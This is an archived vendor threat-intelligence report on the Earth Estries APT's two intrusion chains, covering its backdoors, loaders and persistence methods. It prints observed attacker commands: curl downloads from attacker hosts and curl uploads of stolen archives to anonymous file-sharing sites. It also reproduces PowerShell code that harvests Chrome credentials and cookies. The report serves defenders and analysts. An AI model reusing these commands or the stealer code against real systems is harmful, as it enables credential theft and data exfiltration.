{ "id": "f497e882-5193-444f-9559-107f40ecf464", "created_at": "2026-04-06T00:08:03.423656Z", "updated_at": "2026-04-10T13:12:10.777052Z", "deleted_at": null, "sha1_hash": "3fc2dc15d67583665a9daf7cc36f246b4864d052", "title": "Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 721050, "plain_text": "Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber\r\nOperations\r\nBy By: Ted Lee, Leon M Chang, Lenart Bermejo Nov 08, 2024 Read time: 14 min (3823 words)\r\nPublished: 2024-11-08 · Archived: 2026-04-05 18:41:40 UTC\r\nAPT \u0026 Targeted Attacks\r\nDiscover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as\r\nZingdoor and Snappybee, for its campaigns.\r\n \r\nSummary\r\nEarth Estries employs two distinct attack chains in their campaigns that have some common characteristics,\r\nsuch as the exploitation of vulnerabilities in systems like Microsoft Exchange servers and network adapter\r\nmanagement tools.\r\nThe first infection chain uses PsExec and tools such as Trillclient, Hemigate, and Crowdoor delivered via\r\nCAB files, while the second chain employs malware like Zingdoor and SnappyBee, delivered through\r\ncURL downloads.\r\nEarth Estries maintains persistence by continuously updating its tools and employs backdoors for lateral\r\nmovement and credential theft.\r\nData collection and exfiltration are performed using Trillclient, while tools like cURL are used for sending\r\ninformation to anonymized file-sharing services, employing proxies to hide backdoor traffic.\r\nIntroduction\r\nIn early 2023, we published a blog entry on campaigns targeting governments and the tech industry from Earth\r\nEstries (aka Salt Typhoon), a high-level threat actor that has been active since at least 2020.  In this report, we\r\nanalyze two distinct attack chains by the group that demonstrates the varied tactics, techniques, and tools that they\r\nuse to compromise targeted systems.\r\nThere are some commonalities between the two attack chains, like the abuse of vulnerable attack surfaces such as\r\nMicrosoft Exchange servers and network adapter management tools. However, there are also significant\r\ndifferences. The first chain employs PsExec and WMI command-line (WMIC) for lateral movement, using tools\r\nsuch as Cobalt Strike, Trillclient, Hemigate, and Crowdoor, which are delivered via CAB file packages. The\r\nsecond chain showcases a different approach, using malware such as Zingdoor, Cobalt Strike, and SnappyBee, as\r\nwell as utility tools like PortScan and NinjaCopy, which are delivered via curl downloads.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 1 of 19\n\nBoth attack chains exhibit persistence by continually updating existing employed installations of their tools,\r\nallowing for prolonged campaigns, and the ability to stay within compromised networks.\r\nThe first infection chain\r\nIn the first attack scenario, Earth Estries uses an installation of QConvergeConsole, a web-based management tool\r\nfor configuring and managing QLogic Fibre Channel Adapters, as one of its entry methods, along with various\r\nCobalt Strike installations with Crowdoor backdoors — delivered via CAB file packages — to maintain control.\r\nPSExec is heavily used in the earlier stages of the attacks, while the backdoors themselves are also used for lateral\r\nmovement.\r\nEarth Estries continues to employ Trillclient for user credential theft from browser caches to extend its presence\r\nwithin the network. The threat actor has also exhibited intimate knowledge of the target's environment and\r\nmethodology, since they used wget to specifically download documents from the target's internal web-based\r\ndocument management system.\r\nInitial access\r\nOur telemetry suggests that Earth Estries gains initial access to their target’s system by exploiting vulnerabilities\r\nin outside-facing services or remote management utilities.\r\nThe group has been observed to take advantage of either vulnerable or misconfigured QConvergeConsole\r\ninstallations in one of its target’s servers to gain access to their system. The installed remote application\r\nagent (c:\\program files\\qlogic corporation\\nqagent\\netqlremote.exe) can perform network discovery and install\r\nCobalt Strike on a target machine.\r\nCommands\r\nC:\\Windows\\system32\\cmd.exe /C net group \"domain admins\" /domain\r\nC:\\Windows\\system32\\cmd.exe /C copy C:\\users\\public\\music\\go4.cab \\\\\r\n{HostName}\\c$\\programdata\\microsoft\\drm\r\nC:\\Windows\\system32\\cmd.exe /C expand -f:* \\\\{HostName}\\c$\\programdata\\microsoft\\drm\\go4.cab \\\\\r\n{HostName}\\c$\\programdata\\microsoft\\drm\r\nC:\\Windows\\system32\\cmd.exe /C c:\\users\\public\\music\\PsExec.exe -accepteula \\\\172.16.xx.xx\r\n\"c:\\ProgramData\\Microsoft\\DRM\\g2.bat\"\r\nIn another instance, they made used a vulnerability in Apache Tomcat6 bundled with QConvergeConsole\r\n(c:\\program files (x86)\\qlogic corporation\\qconvergeconsole\\tomcat-x64\\apache-tomcat-6.0.35\\bin\\tomcat6.exe)\r\nto perform lateral movement activities and operation of later stage tools:\r\nCommands\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 2 of 19\n\nC:\\Windows\\system32\\cmd.exe /C wmic /node:172.16.xx.xx process call create \"cmd.exe /c\r\nc:\\ProgramData\\Microsoft\\DRM\\182.bat\"\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Music\\rar.exe a -m5 C:\\Users\\Public\\Music\\pdf0412.rar\r\nC:\\Users\\Public\\Music\\temp\\*.pdf\r\nBackdoor\r\nCobalt Strike is used as the first-stage backdoor to perform lateral movement and deploy the second-stage\r\nbackdoor. In their previous operation, HemiGate was used as the second-stage backdoor to  maintain access to\r\ncompromised machines. However, Earth Estries used a new backdoor, Crowdoor, in this attack.\r\nCrowdoor\r\nThe new backdoor variant, Crowdoor, has been observed to interact with the Cobalt Strike installation, in keeping\r\nwith Earth Estries’ tools, tactics, and procedures (TTPs) of cleaning up and reinstalling tools. Both instances of\r\nCrowdoor and the reinstalled Cobalt Strike were brought in as CAB files by preceding instances.\r\nFigure 1. The first attack chain used by Earth Estries\r\nThe infection chain of new CrowDoor variant is shown in Figure 2.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 3 of 19\n\nFigure 2. Infection chain for the Crowdoor malware\r\nCrowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the\r\nbehaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar\r\nto the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command\r\nIDs (shown in table 2)\r\nArguments Action\r\nNo argument Persistence is set through the registry Run key or a service and the backdoor is restarted\r\n0 Persistence is set through the registry Run key or a service and the backdoor is restarted.\r\n1 The backdoor is restarted by injecting to 'msiexec.exe'\r\n2 The backdoor main function is called\r\nTable 1. List of arguments and their corresponding actions\r\nOld Crowdoor\r\nvariant\r\nNew Crowdoor\r\nvariant\r\nFunctions\r\n0x2347135 0x11736212 Initial connection C2\r\n0x2347136 0x11736213\r\nCollect ComputerName,Username, OS version and hostnet or\r\nIP information\r\n0x2347137 0x11736214 Remote shell\r\n0x234713B 0x11736218 Delete malware files, persistence and exit\r\n0x2347140 0x1173621D File related Operation\r\n0x2347141 0x1173621E Open/ReadFile\r\n0x2347142 0x1173621F Open/WriteFile\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 4 of 19\n\n0x2347144 0x11736221 Collect drive information\r\n0x2347145 0x11736222 Search File\r\n0x2347148 0x11736225 CreateDirectory\r\n0x2347149 0x11736226 Rename file or directory\r\n0x234714A 0x11736227 Delete file or Directory\r\n0x234714A 0x11736228 Communication with C\u0026C server \r\nTable 2. Comparison between old and new Crowdoor variants\r\nPackage 1 Package 2 Package 3 Package 4\r\nWinStore.exe (Host) K7Sysmon.exe (Host) HxTsk.exe (Host) MsMsRng.exe (Host)\r\nSqlite3.dll K7Sysmn1.dll d3d8.dll sqlite3.dll\r\ndatastate.dll K7Sysmn2.dll HxTsk (encrypted) msimg32.dll\r\ndatast.dll K7Sysmn3.dll   datastate.dll\r\nWinStore (encrypted) K7Sysmon.dll (encrypted)   MsMsRng (encrypted)\r\nTable 3. Crowdoor packages\r\nLateral Movement\r\nEarth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing\r\nthe backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.\r\nTypically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in\r\nsome instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied\r\nand executed to perform the extraction, installation, and execution of the malware. Large scale collection may also\r\nbe executed using batch files.\r\nIn later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still\r\nused as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation\r\nand execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file\r\nto act as an indirect persistence mechanism for the actual backdoors.\r\nDiscovery, collection and exfiltration\r\nTrillClient’s user credential discovery\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 5 of 19\n\nEarth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the\r\nTrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles.\r\nTrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:\r\nforeach($win_user_path in $users_path){\r\necho D | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Roaming\\Microsoft\\Protect\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Protect\\\" /E /C /H;\r\nattrib -a -s -r -h \\\"$copy_dest_path\\$win_user_path\\*\\\" /S /D;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Local State\\\" /C;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\Default\\Network\\Cookies\\\" \\\"$copy_dest_path\\$win_user_path\\Default\\Network\\Cookies\\\" /C\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Default\\Login Data\\\" /C;\r\n$profile_path = Get-ChildItem -Name \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\\\\\\" -Include *Profile* -ErrorAction SilentlyContinue;\r\nforeach($chrome_user_path in $profile_path){\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\$chrome_user_path\\Network\\Cookies\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\$chrome_user_path\\Network\\Cookies\\\" /C;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\$chrome_user_path\\Login Data\\\" \\\"$copy_dest_path\\$win_user_path\\$chrome_user_path\\Login Data\\\"\r\n/C;\r\n   }\r\n}\r\nData will be collected from the following folders:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Network\\Cookies\r\n%APPDATA%\\Microsoft\\Protect\\*\r\nThe collected data will be temporarily copied to \u003c%TEMP%\\browser_temp_data\u003cRANDOM\u003e\u003e, archived using\r\nthe tar command, and encrypted with an XOR algorithm.\r\ntar -cvf \\\"$copy_dest_path\\tar\\\" $copy_dest_path;\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 6 of 19\n\n$e_a = [System.IO.File]::ReadAllBytes(\\\"$copy_dest_path\\tar\\\");Remove-Item -Path $copy_dest_path -Recurse;\r\n$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 - ($e_i % 199)));$e_i += 1;\r\n$random_filename = \\\"300775736611547784207972935122149919289871693\\\";\r\n$out_put_file = $out_put_path + \\\"\\\\\\\" + $random_filename;\r\necho $out_put_file;\r\n[System.IO.File]::WriteAllBytes($out_put_file, $e_a);\r\nThe collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol\r\n(SMTP).\r\nCollection of sensitive documents\r\nEarth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to\r\ndownload target documents from an internal web-based document management platform to a collection folder\r\nbefore archiving them.\r\nIn this instance, a batch file containing commands to download PDF files to the collection directory is\r\nexecuted, containing hardcoded document names:\r\nc:\\users\\public\\music\\temp\\wget.exe -c \"hxxp://172.16.xx.xx/{document path}/{Hardcoded\r\nFilename}.pdf\" -P c:\\users\\public\\music\\temp\r\nAfterwards, collected PDF’s are archived\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Music\\rar.exe a -m5\r\nC:\\Users\\Public\\Music\\pdf0412.rar C:\\Users\\Public\\Music\\temp\\*.pdf\r\nCollection via backdoor\r\nEarth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information\r\nof interest both from both local and remote locations. Some examples of collection commands performed are as\r\nfollows:\r\nExample command Functions\r\nrar.exe  a -m5 \u003cinstall path\u003e\\322.rar \\\\\u003cremote machine\u003e\\c$\\\u003cremote\r\npath\u003e\r\nCollect Gather information\r\ncollected by an older generation\r\nof infection from a remote\r\nmachine\r\nrar.exe  a -m5 \u003cinstall path\u003e \\his231.rar \"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\"\r\nCollect browser history files,\r\nwhich are of. Of interest to the\r\nattackers to be able to\r\ncompromise more credentials\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 7 of 19\n\nrar.exe  a \u003cinstall path\u003e\\0311.rar C:\\users\\\u003cuser name\u003e\\Desktop\\*\r\nC:\\users\\ \u003cuser name\u003e \\Downloads\\* C:\\users\\ \u003cuser name\u003e\r\n\\Documents\\* -r -y -ta\u003ccutoff date\u003e\r\nCollection ofCollect more recent\r\nfiles and/or documents\r\ninteracted with by a local user\r\nTable 4. Collection commands\r\nTelemetry suggests that they were exfiltrated through the same methods that the collection command is executed:\r\neither through the command-and-control (C\u0026C) channels of their backdoors, or through the same initial access\r\nmethod used to control these tools.\r\nThe second infection chain\r\nAn overview of the second Earth Estries attack flow is shown in figure 3:\r\nFigure 3. Overall flow used for the second attack routine\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 8 of 19\n\nIn this attack routine, initial access is gained via exploitation of the Microsoft Exchange server to implant a web\r\nshell that allows the delivery of the Cobalt Strike beacon. Meanwhile, lateral movement is performed by the initial\r\nbackdoor, with additional backdoors such as Zingdoor and Snappybee (Deed RAT) being installed in other\r\nmachines within the network. Delivery of these additional backdoors and tools is done either via a C\u0026C server or\r\nby using cURL to download them from attacker-controlled servers. These backdoor installations are also\r\nperiodically replaced and updated. The collection of documents of interest are done via RAR and are exfiltrated\r\nusing cURL, with the data being sent to anonymized file sharing services.\r\nInitial access\r\nWhile tracking Earth Estries’ recent activities, we found that the group exploits the Microsoft Exchange server and\r\ninstalls the web shell ChinaChopper, through which Earth Estries can deploy Cobalt Strike into other Active\r\nDirectory (AD) servers or individual endpoints and set up the scheduled task and system service to maintain\r\npersistence in the victim’s environment.\r\nThe command sequence from the web shell is as follows:\r\nFigure 4. Webshell commands on access\r\nLateral movement, persistence and control\r\nWe have identified four major tools that Earth Estries uses to take control of the target machines: Cobalt Strike,\r\nZingdoor, and Snappybee.\r\nZingdoor is an HTTP Backdoor written in Golang that serves as one of the recurring backdoors deployed by Earth\r\nEstries. This is primarily loaded via DLL sideloading using Windows Defender’s MsSecEs.exe.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 9 of 19\n\nSnappybee (Deed RAT), a modular backdoor that is said to be the successor to ShadowPad, was previously\r\nrevealed by Postiv Technologies. Like Zingdoor, the primary execution method of Snappybee is through DLL\r\nsideloading.\r\nEarth Estries also employs Cobalt Strike in various stages of attacks. While some Cobalt Strike deployments\r\nsimilarly use DLL sideloading, others were deployed using alternate loading methods to enhance persistence and\r\ndefense evasion. Many of the Cobalt Strike installations were configured to use DNS tunnelling to communicate\r\nwith their C\u0026C servers\r\nIn one of the attacks we observed, Zingdoor was used as a first stage backdoor. In the later stages of the attack\r\nroutine, we were able to see successive deployments of the other backdoors through preceding installations:\r\nZingdoor to Snappybee and then to Cobalt Strike (however, this is not always the order of deployment). There\r\nwere also instances where preceding installations were cleaned up by the succeeding ones, like in the case of\r\nCobalt Strike removing Snappybee shortly after it was deployed.\r\nFigure 5. Deploying Zingdoor, Snappybee, and Cobalt Strike\r\nThe most common persistence mechanism used by Earth Estries is done via scheduled tasks. These are achieved\r\nin several ways, including the use of WMIC, allowing the remote creation of scheduled tasks:\r\nwmic /node:\u003cIP\u003e /user:\u003cdomain\u003e\\\u003cuser\u003e /password:***** process call create \"schtasks /run /tn\r\nmicrosoft\\sihost\"\r\nThe routine also uses cURL to download additional components to remote machines.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 10 of 19\n\nTool Download cURL dommand\r\nSnappybee payload curl -o c:\\windows\\ime\\imejp\\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt\r\nZingdoor curl -k -o C:\\programdata\\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx\r\nPortscan curl -k -o C:\\programdata\\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx\r\nTable 5. Downloading tools via cURL commands\r\nNetwork Discovery via PortScan\r\nNetwork discovery and mapping are done by the backdoors directly via command line execution. Occasionally,\r\nPortscan would also be employed for this purpose. The first set of commands download PortScan then scan the\r\nnetwork for the specified open ports (80, 443, 445, and 3389):\r\ncmd.exe /c \"curl -k -o C:\\programdata\\portscan.exe hxxp://mail.ocac.org.pk/Portscan.docx\"\r\ncmd.exe /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443\"\r\ncmd.exe /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443 \u003e1.log\"\r\ncmd.exe /c \"cmd /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443\" \u003e\u003e1.log\"\r\nLateral installation of Zingdoor\r\nAfter the port scanning step, a set of Zingdoor malware is downloaded. This is then copied to a separate machine\r\nthat was discovered during the port scanning.\r\ncmd.exe /c \"curl -k -o C:\\programdata\\SetupPlatform.exe hxxp://mail.ocac.org.pk/SetupPlatform.docx\"\r\ncmd.exe /c \"curl -k -o C:\\programdata\\UNBCL.dll hxxp://mail.ocac.org.pk/UNBCL.docx\"\r\ncmd.exe /c \"copy C:\\programdata\\SetupPlatform.exe \\\\172.xx.xx.xx\\c$\\ProgramData\\Microsoft\\Windows\"\r\ncmd.exe /c \"copy C:\\programdata\\SetupPlatform.exe \\\\172.xx.xx.xx\\c$\\ProgramData\\Microsoft\\Windows\"\r\nRemote service creation\r\nThrough ChinaChopper, Earth Estries can place commands to remotely create services for persistence and\r\nprivilege escalation.\r\n\"cmd\" /c cd /d \"c:\\Windows\\IME\\IMEJP\\\"\u0026net use \\\\{hostname} {password} /user:{user name}\u0026echo\r\n[S]\u0026cd\u0026echo [E]\r\n\"cmd\" /c cd /d \"c:\\Windows\\IME\\IMEJP\\\"\u0026copy v*.* \\\\ {hostname} \\c$\\programdata\\vmware\\\u0026echo\r\n[S]\u0026cd\u0026echo [E]\r\nsc \\\\ {hostname} create VGAuthtools type= own start= auto binpath=\r\n\"c:\\windows\\microsoft.net\\Framework\\v4.0.30319\\Installutil.exe C:\\Programdata\\VMware\\vmvssrv.exe\"\r\nFrom the configuration of the created service, the malicious loader, vmvssrv.exe (a malicious loader written in\r\n.NET assembly) is launched by using Intallutil.exe, which is a built-in installation utility in Windows system. The\r\nvmvssrv.exe loader will then load and launch Cobalt Strike to compromise the target machine.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 11 of 19\n\nRemote scheduled task\r\nAgain using ChinaChopper,the  threat actor can input commands to remotely create scheduled tasks for\r\npersistence.\r\nschtasks /create /tn VMware\\vmtools /tr \"cmd /c \\\"start C:\\Programdata\\VMware\\vmtools.exe\\\"\" /sc onstart\r\n/ru \"\" /S 10.131.xx.xx /U {user name} /P {password} \u0026echo [S]\u0026cd\u0026echo [E]\r\nThe installed vmtool.exe file, which is deployed via the web shell, is a malicious loader used to load Cobalt Strike.\r\nExecution: alternate loading methods\r\nEarth Estries employs various loading methods for its tools, particularly Cobalt Strike. Aside from DLL\r\nsideloading, other loader components were designed to be used via the following methods.\r\nExecutable loaders\r\nCobalt Strike loaders use straightforward executable loaders such as vmtools.exe, a loading mechanism that will\r\nload an encrypted payload named msvsct.obj. This type of loader uses single byte multi-layer ADD – XOR – SUB\r\nbitwise operation to decrypt their payloads.\r\nFigure 6. The vmtools.exe decryption routine\r\nRundll32.exe loaders\r\nA DLL version of the loader can also be deployed to load Cobalt Strike. This involves a scheduled task added via\r\ncommand line for persistence:\r\nC:\\\\Windows\\\\system32\\\\cmd.exe /C sc create VMware binpath= \\\"rundll32.exe\r\nC:\\\\Progra~1\\\\VMware\\\\vmtools.dll,fjdpw03d\\\" start= auto displayname= \\\"VMware\\\"\r\nThis loader uses the Base64 decoding algorithm with a custom alphabet to decrypt its payload.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 12 of 19\n\nFigure 7. The vmtools.dll using Base64 with custom alphabet\r\nA later version of this loader uses a simplified decryption with single byte XOR to decrypt its payload.\r\nFigure 8. Snippets showing vmtools.dll (top) and audiodg.dll (bottom)\r\nMsiexec.exe loaders\r\nCobalt Strike can also be loaded via loader components using msiexec.exe:\r\nmsiexec.exe  /y C:\\Windows\\PLA\\Performance.dll\r\nThese series of loaders are simpler and use single-byte XOR for decryption.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 13 of 19\n\nFigure 9. Loader using single byte XOR for decryption\r\nThis type of installation also comes with a Windows Service for persistence and execution:\r\nsc create pasrv binpath= \"cmd /c \\\"start msiexec.exe /y C:\\Windows\\PLA\\Performance.dll\\\"\" start= auto\r\ndisplayname= \"Microsoft Performance Alerts Server\"\r\nCredential Dumping\r\nRe-implemented NinjaCopy\r\nNinjaCopy is a hack tool that is well known for its ability to copy protected system files. Using the tool, threat\r\nactors can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing\r\nthe NTFS structures. This allows them to bypass the following protections (note that a Win32 API was not used,\r\nso Windows is not aware that these protections were being ignored):\r\n1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or\r\nSYSTEM registry hives.\r\n2. System Access Control List (SACL) flag set on a file that alerts when the file is opened. (\r\n3. Bypass the Discretionary Access Control Lists (DACLs), such as those that only allows SYSTEM to open\r\na file.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 14 of 19\n\nDuring the operation, we notice that Earth Estries implemented a new variant of NinjaCopy by using an open-source NTFS parser released by Velocidex. With this variant, the attacker successfully extracted the SYSTEM\r\nregistry hives which contain sensitive data from the victim’s environment.\r\nCollection and exfiltration\r\nInformation collection is done via RAR archives which are mostly password-protected. The following are the\r\nRAR commands used by Earth Estries over the course of one of its campaigns:\r\nrar a -m3 -inul -ed -r -s –hp{password} -ta{yyyymmdd} -n*.pdf -n*.ddf -x*\"\\{avoided path}\\\" {Collector\r\nPath}\\out\u003cn\u003e.tmp \\\\{IP}\\“{Target Path}“\r\nMeanwhile, the following are the passwords that they used:\r\ntakehaya\r\nforeverthegod\r\ndh2uiwqji9dash\r\nExfiltration is done using cURL, which sendis the stolen documents to anonymized file sharing services:\r\ncurl -F \"file=@c:\\windows\\ime\\out1.tmp\" hxxps://api.anonfiles[.]com/upload\r\ncurl -F \"file=@c:\\windows\\ime\\out1.tmp\" -k hxxps:/file[.]io\r\ncurl -F \"file=@c:\\windows\\ime\\out3.tmp\" hxxps://api.anonfiles[.]com/upload\r\nCommand-and-Control\r\nHiding backdoor traffic via internal proxy server\r\nWe notice one of the C\u0026C addresses used for Zingdoor is an internal IP address. After further investigation, we\r\nfound that the internal address refers to the internal proxy server in the victim’s environment. We infer that the\r\nthreat actor attempted to use the victim’s proxy server to forward traffic to the actual C\u0026C servers, making the\r\ntraffic from the backdoor more difficult to discover.\r\nAdditional observations\r\nDuring the investigation, we found are other backdoors, including an Internet Information Services (IIS) backdoor\r\n(FuxosDoor) and a customized backdoor (Cryptmerlin).\r\nWe are not certain if these backdoors were indeed deployed by Earth Estries. However, the approximate\r\noccurrence time is close, and they were found within the same infected machine. Hence, we still include these\r\nfindings in this report.\r\nFuxosDoor\r\nFuxosDoor is an IIS backdoor which was deployed and ran on the compromised exchange server. Once it receives\r\na request with a specific URL path, /web.config from the attacker, it will try to extract the encrypted command\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 15 of 19\n\nfrom the field (ASP.NET_SessionId) in the HTTP header and then execute the received command by using the\r\ncommand prompt (cmd.exe). After, the results will be encrypted and sent back to the attacker’s server.\r\nFigure 10. Receiving a request via /web.config\r\nFigure 11. Decryption algorithm for the received content\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 16 of 19\n\nFigure 12. Encryption algorithm for the response\r\nCryptmerlin\r\nAttackers used the DLL sideloading technique on the target machine to launch Cryptmerlin, a customized\r\nbackdoor based on an open-source malware, Merlin Agent, written in Golang. Unlike the original Merlin Agent,\r\nCryptmerlin currently only implements the ExecuteCommand function, which will communicate to the C\u0026C\r\nserver via HTTP/HTTPS request. To lower the security warning on the infected machine, Cryptmerlin can also\r\ncommunicate with the C\u0026C server over proxy server, with the information of the victim’s internal proxy also\r\nembedded in the config.\r\nFilename Description\r\nsvcchost.exe Legitimate file used as main loader\r\nshfolder.dll\r\nDLL sideloaded by svcchost.exe; a simple loader will find and load another DLL file named\r\nsvcchost.dll\r\nsvcchost.dll Malicious payload, which is the backdoor malware Cryptmerlin\r\nTable 4. Files used for the Crypmerlin backdoor\r\nConclusion\r\nOur analysis of Earth Estries’ persistent TTPs in prolonged cyber operations reveals a sophisticated and adaptable\r\nthreat actor that employs various tools and backdoors, demonstrating not only technical capabilities, but also a\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 17 of 19\n\nstrategic approach to maintaining access and control within compromised environments.\r\nIn the first infection chain, Earth Estries exploited vulnerabilities in web-based adapter management tools like\r\nQConvergeConsole, employing tools like Cobalt Strike, Hemigate, and Crowdoor that are delivered via CAB file\r\npackages. Along with PsExec, these backdoors also facilitated lateral movement throughout the network. The\r\nincorporation of Trillclient for credential harvesting from browser caches further illustrates the group’s\r\ncomprehensive tactics aimed at deepening their foothold in the target environment.\r\nIn the second infection chain, Earth Estries capitalized on vulnerable Exchange servers, making use of web shells,\r\nsuch as ChinaChopper and additional backdoors such as Zingdoor, SnappyBee, and Cobalt Strike, all of which\r\nhighlights the diversity of Earth Estries’ toolkit. The deployment of these tools via C\u0026C channels, alongside the\r\nuse of techniques like DLL sideloading and cURL for downloading components, underscores their ability to adapt\r\nin response to defensive measures.\r\nThroughout their campaigns, Earth Estries has displayed a keen understanding of their target environments, by\r\ncontinually identifying exposed layers for re-entry. By using a combination of established tools and custom\r\nbackdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.\r\nRecommendations\r\nDefensive efforts should focus on securing external-facing services, especially email servers and web applications,\r\npatching known vulnerabilities, and implementing robust credential management practices. The continued\r\nevolution of new tools and tactics used by groups such as Earth Estries reinforces the necessity for constant\r\nvigilance and for implementing a multilayered defense to protect critical infrastructure from such sophisticated\r\nintrusion sets.\r\nFinally, using technologies such as Trend Vision One™ enables security teams and analysts to view all\r\ncomponents of the organization from a single platform. It allows them to monitor and track tools, behaviors, and\r\npayloads as they attempt to move and execute within the organization’s networks, systems, and infrastructure. At\r\nthe same time, it detects and blocks threats as early in the attack or infection process as possible.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nBreaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actors: Earth Estries\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 18 of 19\n\nEmerging Threats: Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in\r\nthis blog post with data in their environment.   \r\nEarth Estries Malware DetectionmalName:(*HEMIGATE* OR *DRACULOADER* OR *CROWDOOR* OR\r\n*ZINGDOOR* OR *TRILLCLIENT*) AND eventName: MALWARE_DETECTION\r\nMore hunting queries are available for Vision 